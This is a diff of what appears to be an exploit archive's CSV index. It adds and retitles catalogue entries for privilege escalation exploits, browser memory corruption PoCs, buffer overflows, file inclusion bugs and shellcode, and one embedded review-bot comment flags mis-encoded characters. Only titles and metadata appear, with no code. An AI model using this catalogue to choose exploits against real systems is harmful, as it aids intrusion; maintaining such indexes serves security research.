diff --git a/files.csv b/files.csv
index a14c17815..a8eebacf6 100644
--- a/files.csv
+++ b/files.csv
@@ -729,8 +729,8 @@ id,file,description,date,author,platform,type,port
 5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 - subtitle Buffer Overflow (PoC)",2008-04-19,grzdyl,windows,dos,0
 5515,platforms/windows/dos/5515.txt,"Groupwise 7.0 - 'mailto: scheme' Buffer Overflow (PoC)",2008-04-28,"Juan Yacubian",windows,dos,0
 5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers Denial of Service",2008-05-05,Nicob,windows,dos,0
-5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - iso_recv_msg() Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos,0
-5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - process_redirect_pdu() BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0
+5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos,0
+5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0
 5679,platforms/multiple/dos/5679.php,"PHP 5.2.6 - sleep() Local Memory Exhaust Exploit",2008-05-27,Gogulas,multiple,dos,0
 5682,platforms/windows/dos/5682.html,"CA Internet Security Suite 2008 - SaveToFile()File Corruption (PoC)",2008-05-28,Nine:Situations:Group,windows,dos,0
 5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC)",2008-05-29,securfrog,windows,dos,0
@@ -5281,6 +5281,11 @@ id,file,description,date,author,platform,type,port
 40814,platforms/hardware/dos/40814.txt,"TP-LINK TDDP - Multiple Vulnerabilities",2016-11-22,"Core Security",hardware,dos,1040
 40815,platforms/windows/dos/40815.html,"Microsoft Internet Explorer 8 MSHTML - 'Ptls5::Ls­Find­Span­Visual­Boundaries' Memory Corruption",2016-11-22,Skylined,windows,dos,0
 40828,platforms/windows/dos/40828.py,"Core FTP LE 2.2 - 'SSH/SFTP' Remote Buffer Overflow (PoC)",2016-11-27,hyp3rlinx,windows,dos,0
+40840,platforms/linux/dos/40840.py,"NTP 4.2.8p3 - Denial of Service",2016-11-28,"Magnus Klaaborg Stubman",linux,dos,0
+40841,platforms/windows/dos/40841.html,"Microsoft Internet Explorer 8 MSHTML - 'SRun­Pointer::Span­Qualifier/Run­Type' Out-Of-Bounds Read (MS15-009)",2016-11-28,Skylined,windows,dos,0
+40843,platforms/windows/dos/40843.html,"Microsoft Internet Explorer 11 MSHTML - 'CGenerated­Content::Has­Generated­SVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos,0
+40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 MSHTML - 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0
+40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8 / 9 / 10 / 11 MSHTML - 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
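Review bot: The added rows 40841, 40843 and 40844 carry mis-encoded characters (rendered `­`) inside the MSHTML symbol names, e.g. `'SRun­Pointer::Span­Qualifier/Run­Type'`, so a search of the description column for `SRunPointer::SpanQualifier` will miss them. They look like UTF-8 soft hyphens (U+00AD) read back as Latin-1, the same artifact the unchanged 40815 row already shows, so the titles were probably copied verbatim from the advisory headings. Normalizing these symbol names to plain ASCII before commit would keep the description field searchable and consistent with the quoted identifiers elsewhere in this hunk.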
@@ -5437,7 +5442,7 @@ id,file,description,date,author,platform,type,port
 713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",solaris,local,0
 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0
 715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0
-718,platforms/linux/local/718.c,"Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0
+718,platforms/linux/local/718.c,"Linux Kernel 2.6.x < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0
 739,platforms/bsd/local/739.c,"FreeBSD TOP - Format String",2001-07-23,truefinder,bsd,local,0
 741,platforms/linux/local/741.pl,"HTGET 0.9.x - Privilege Escalation",2005-01-05,nekd0,linux,local,0
 744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0
@@ -5787,7 +5792,7 @@ id,file,description,date,author,platform,type,port
 4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0
 4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0
 4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0
-4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0
+4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0
 4515,platforms/solaris/local/4515.c,"Solaris 10 (SPARC/x86) - sysinfo Kernel Memory Disclosure",2007-09-01,qaaz,solaris,local,0
 4516,platforms/solaris/local/4516.c,"Solaris (SPARC/x86) - fifofs I_PEEK Kernel Memory Disclosure",2007-10-10,qaaz,solaris,local,0
 4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - Safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0
@@ -6514,8 +6519,8 @@ id,file,description,date,author,platform,type,port
 14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0
 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
-15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86_64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
-15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86_64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0
+15023,platforms/linux/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",linux,local,0
+15024,platforms/linux/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,linux,local,0
 15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0
 15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - SEH Exploit",2010-09-17,"Abhishek Lyall",windows,local,0
 15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local SEH Exploit",2010-09-17,modpr0be,windows,local,0
@@ -7832,7 +7837,7 @@ id,file,description,date,author,platform,type,port
 24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
 24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0
 24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - '.pxs' Memory Corruption",2013-02-15,"Julien Ahrens",windows,local,0
-24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0
+24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0
 24570,platforms/linux/local/24570.txt,"QNX PPPoEd 2.4/4.25/6.2 - Path Environment Variable Local Command Execution",2004-09-03,"Julio Cesar Fort",linux,local,0
 24578,platforms/osx/local/24578.rb,"Tunnelblick - Setuid Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
 24579,platforms/osx/local/24579.rb,"Viscosity - setuid-set ViscosityHelper Privilege Escalation (Metasploit)",2013-03-05,Metasploit,osx,local,0
@@ -7904,7 +7909,7 @@ id,file,description,date,author,platform,type,port
 25961,platforms/windows/local/25961.c,"SoftiaCom wMailServer 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0
 25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0
 26100,platforms/linux/local/26100.sh,"Lantronix Secure Console Server SCS820/SCS1620 - Multiple Local Vulnerabilities",2005-08-05,c0ntex,linux,local,0
-26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0
+26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86-64) - 'perf_swevent_init' Privilege Escalation (2)",2013-06-11,"Andrea Bittau",linux,local,0
 26185,platforms/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0
 26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0
 26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,linux,local,0
@@ -8636,8 +8641,8 @@ id,file,description,date,author,platform,type,port
 40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
 40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
-40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
-40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
+40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access)",2016-10-19,"Phil Oester",linux,local,0
+40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation",2016-10-21,"Robin Verton",linux,local,0
 40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0
 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
@@ -8651,6 +8656,7 @@ id,file,description,date,author,platform,type,port
 40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
 40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
+40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)",2016-10-26,"Phil Oester",linux,local,0
 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
@@ -8660,6 +8666,7 @@ id,file,description,date,author,platform,type,port
 40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
 40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0
 40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0
+40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation",2016-11-28,FireFart,linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -10073,7 +10080,7 @@ id,file,description,date,author,platform,type,port
 10434,platforms/windows/remote/10434.py,"Savant Web Server 3.1 - Remote Buffer Overflow (3)",2009-12-14,DouBle_Zer0,windows,remote,80
 10451,platforms/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - NetBiterConfig.exe Remote Buffer Overflow",2009-12-14,"Ruben Santamarta",hardware,remote,0
 10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL module Clientless URL-list control Bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0
-10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69
+10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Remote Buffer Overflow (2)",2009-12-18,Molotov,windows,remote,69
 10579,platforms/multiple/remote/10579.py,"TLS - Renegotiation (PoC)",2009-12-21,"RedTeam Pentesting",multiple,remote,0
 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0
 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0
@@ -11167,7 +11174,7 @@ id,file,description,date,author,platform,type,port
 18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow (Metasploit)",2012-04-10,Metasploit,windows,remote,0
 18735,platforms/windows/remote/18735.rb,"Quest InTrust - Annotation Objects Uninitialized Pointer (Metasploit)",2012-04-13,Metasploit,windows,remote,0
 18738,platforms/php/remote/18738.rb,"V-CMS - Arbitrary .PHP File Upload / Execution (Metasploit)",2012-04-14,Metasploit,php,remote,0
-18759,platforms/windows/remote/18759.rb,"TFTP Server 1.4 (Windows) - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,remote,0
+18759,platforms/windows/remote/18759.rb,"TFTP Server 1.4 - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,remote,0
 18761,platforms/linux/remote/18761.rb,"Adobe Flash Player - ActionScript Launch Command Execution (Metasploit)",2012-04-20,Metasploit,linux,remote,0
 18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x - WebDAV File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote,0
 18780,platforms/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit)",2012-04-25,Metasploit,windows,remote,0
@@ -15023,6 +15030,7 @@ id,file,description,date,author,platform,type,port
 40113,platforms/linux/remote/40113.txt,"OpenSSHd 7.2p2 - Username Enumeration (1)",2016-07-18,"Eddie Harari",linux,remote,22
 40119,platforms/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0
 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote,0
+40846,platforms/android/remote/40846.html,"Android - 'BadKernel' Remote Code Execution",2016-11-28,"Guang Gong",android,remote,0
 40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0
 40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80
 40136,platforms/linux/remote/40136.py,"OpenSSHd 7.2p2 - Username Enumeration (2)",2016-07-20,0_o,linux,remote,22
@@ -15098,6 +15106,12 @@ id,file,description,date,author,platform,type,port
 40805,platforms/multiple/remote/40805.rb,"Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80
 40813,platforms/hardware/remote/40813.txt,"Crestron AM-100 - Multiple Vulnerabilities",2016-11-22,"Zach Lanier",hardware,remote,0
 40824,platforms/multiple/remote/40824.py,"GNU Wget < 1.18 - Access List Bypass / Race Condition",2016-11-24,"Dawid Golunski",multiple,remote,80
+40830,platforms/windows/remote/40830.py,"VX Search Enterprise 9.1.12 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
+40831,platforms/windows/remote/40831.py,"Sync Breeze Enterprise 9.1.16 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
+40833,platforms/windows/remote/40833.py,"Disk Sorter Enterprise 9.1.12 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
+40832,platforms/windows/remote/40832.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
+40834,platforms/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
+40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15553,7 +15567,7 @@ id,file,description,date,author,platform,type,port
 40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0
 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0
 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell (Port 4444) Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0
-40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egg-hunter Shellcode (25 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
+40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egg-hunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0
 40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Persistent Reverse Shell TCP (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0
@@ -15934,7 +15948,7 @@ id,file,description,date,author,platform,type,port
 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
 1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Arbitrary File Upload",2006-02-09,rgod,php,webapps,0
-1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - (class.forumposts.php) Arbitrary Remote File Inclusion",2006-02-09,rgod,php,webapps,0
+1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - 'class.forumposts.php' Arbitrary Remote File Inclusion",2006-02-09,rgod,php,webapps,0
 1491,platforms/php/webapps/1491.php,"DocMGR 0.54.2 - (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0
 1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,php,webapps,0
 1493,platforms/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0
@@ -16201,7 +16215,7 @@ id,file,description,date,author,platform,type,port
 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0
 1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - 'templatefolder' Parameter Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0
 1918,platforms/php/webapps/1918.php,"Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0
-1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - (mainpath) Remote File Inclusion",2006-06-16,K-159,php,webapps,0
+1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - 'mainpath' Parameter Remote File Inclusion",2006-06-16,K-159,php,webapps,0
 1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0
 1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0
 1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - (Weblinks) Blind SQL Injection",2006-06-17,rgod,php,webapps,0
@@ -16736,7 +16750,7 @@ id,file,description,date,author,platform,type,port
 2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - (includes/functions.php) Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0
 2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - (lib.editor.inc.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0
 2631,platforms/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - (embedded.php) File Inclusion",2006-10-24,Kacper,php,webapps,0
-2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - (mainpath) Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0
+2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - 'mainpath' Parameter Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0
 2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - (login/secure.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0
 2642,platforms/asp/webapps/2642.asp,"Berty Forum 1.4 - 'index.php' Blind SQL Injection",2006-10-24,ajann,asp,webapps,0
 2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Topic Reply Command Execution",2006-10-24,BlackHawk,php,webapps,0
@@ -16796,13 +16810,13 @@ id,file,description,date,author,platform,type,port
 2713,platforms/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion",2006-11-04,GregStar,php,webapps,0
 2714,platforms/php/webapps/2714.pl,"PHPKIT 1.6.1R2 - (search_user) SQL Injection",2006-11-04,x23,php,webapps,0
 2717,platforms/php/webapps/2717.txt,"phpDynaSite 3.2.2 - (racine) Remote File Inclusion",2006-11-04,DeltahackingTEAM,php,webapps,0
-2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - (cart.php) Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0
+2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - 'cart.php' Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0
 2719,platforms/php/webapps/2719.php,"Quick.CMS.Lite 0.3 - (Cookie sLanguage) Local File Inclusion",2006-11-05,Kacper,php,webapps,0
 2720,platforms/php/webapps/2720.pl,"PHP Classifieds 7.1 - 'detail.php' SQL Injection",2006-11-05,ajann,php,webapps,0
 2721,platforms/php/webapps/2721.php,"Ultimate PHP Board 2.0 - (header_simple.php) File Inclusion",2006-11-05,Kacper,php,webapps,0
 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - 'message_details.php' SQL Injection",2006-11-05,Bl0od3r,php,webapps,0
 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro 4.9 r36 - Remote File Inclusion",2006-11-06,the_day,php,webapps,0
-2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - (av) Remote File Inclusion",2006-11-06,the_day,php,webapps,0
+2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - 'av' Parameter Remote File Inclusion",2006-11-06,the_day,php,webapps,0
 2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - (MysqlfinderAdmin.php) Remote File Inclusion",2006-11-06,the_day,php,webapps,0
 2727,platforms/php/webapps/2727.txt,"OpenEMR 2.8.1 - (srcdir) Multiple Remote File Inclusion",2006-11-06,the_day,php,webapps,0
 2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection (1)",2006-11-06,Liz0ziM,php,webapps,0
@@ -16873,7 +16887,7 @@ id,file,description,date,author,platform,type,port
 2823,platforms/php/webapps/2823.txt,"aBitWhizzy - 'abitwhizzy.php' Information Disclosure",2006-11-21,"Security Access Point",php,webapps,0
 2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusion",2006-11-21,3l3ctric-Cracker,php,webapps,0
 2827,platforms/php/webapps/2827.txt,"phpPC 1.04 - Multiple Remote File Inclusion",2006-11-21,iss4m,php,webapps,0
-2828,platforms/asp/webapps/2828.pl,"FipsCMS 4.5 - (index.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0
+2828,platforms/asp/webapps/2828.pl,"FipsCMS 4.5 - 'index.asp' SQL Injection",2006-11-22,ajann,asp,webapps,0
 2829,platforms/asp/webapps/2829.txt,"fipsGallery 1.5 - (index1.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0
 2830,platforms/asp/webapps/2830.txt,"fipsForum 2.6 - (default2.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0
 2831,platforms/php/webapps/2831.txt,"a-ConMan 3.2b - 'common.inc.php' Remote File Inclusion",2006-11-22,Matdhule,php,webapps,0
@@ -17236,7 +17250,7 @@ id,file,description,date,author,platform,type,port
 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0
